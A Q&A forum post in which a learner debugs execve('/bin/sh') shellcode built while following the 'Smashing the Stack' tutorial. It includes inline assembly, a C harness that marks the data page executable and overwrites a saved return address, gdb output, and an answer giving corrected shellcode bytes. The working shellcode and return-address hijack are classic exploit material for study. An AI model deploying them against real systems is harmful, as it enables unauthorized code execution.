I am trying to implement the code given in Smashing the Stack for Fun and Profit by Aleph to learn the basics of buffer overflow attacks.
Machine architecture: Ubuntu 12.10 64 bit
Programs compiled using the -m32 flag in gcc
So far, I have managed to spawn a shell using the assembly instructions. The next step is to convert those instructions into hexadecimal code, where I have encountered this problem. The assembly code for spawning the shell:
```c
void main() {
    __asm__(
        "Start:"
        "jmp CallCode\n\t"
        "CallPop:"
        "popl %esi\n\t"
        "movl %esi,0x8(%esp)\n\t"
        "xorl %eax,%eax\n\t"
        "movb %al,0x7(%esp)\n\t"
        "movl %eax,0xc(%esp)\n\t"
        "movb $0xb,%al\n\t"
        "movl %esi,%ebx\n\t"
        "leal 0x8(%esp),%ecx\n\t"
        "leal 0xc(%esp),%edx\n\t"
        "int $0x80\n\t"
        "xorl %ebx,%ebx\n\t"
        "movl %ebx,%eax\n\t"
        "inc %eax\n\t"
        "int $0x80\n\t"
        "CallCode:"
        "call CallPop\n\t"
        ".string \"/bin/sh\"\n\t"
    );
}
```
Corresponding hex code is:
```c
#include <sys/mman.h>
#include <stdio.h>

#define PAGE_SIZE 4096U

char shellcode[] =
    "\xeb\x24\x5e\x89\x74\x24\x08\x31\xc0\x88\x44\x24\x07\x89\x44\x24\x0c\xb0"
    "\x0b\x89\xf3\x8d\x4c\x24\x08\x8d\x54\x24\x0c\xcd"
    "\x80\x31\x89\xd8\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

void test_shellcode() {
    int *ret;

    // The data section is non-executable
    // Change protection bits for the page containing our shellcode
    mprotect((void *)((unsigned int)shellcode & ~(PAGE_SIZE - 1)),
             2 * PAGE_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC);

    // Overwrite the saved return address of this frame with the shellcode address
    ret = (int *)((char *)&ret + 16);
    (*ret) = (int)shellcode;
}

int main() {
    test_shellcode();
    return 0;
}
```
A bit of analysis using the GDB debugger led me to these results:
```
(gdb) run
Starting program: /home/peps/CCPP/Hello/testsc3

Program received signal SIGILL, Illegal instruction.
0x0804a067 in shellcode ()
(gdb) x/s 0x0804a067
0x804a067 <shellcode+39>: "\377\377\377/bin/sh"
```
After setting breakpoints, I think the problem lies somewhere in the hex code, which I have not been able to figure out. Also, I don't seem to understand the context of Illegal instruction here.
Any help would be appreciated.
Answer
You made a couple of mistakes in your shellcode.
```c
char shellcode[] =
    "\xeb\x24\x5e\x89\x74\x24\x08\x31"
    "\xc0\x88\x44\x24\x07\x89\x44\x24"
    "\x0c\xb0\x0b\x89\xf3\x8d\x4c\x24"
    "\x08\x8d\x54\x24\x0c\xcd\x80\x31"
    "\xdb\x89\xd8\x40\xcd\x80\xe8\xd7"
    "\xff\xff\xff/bin/sh";
```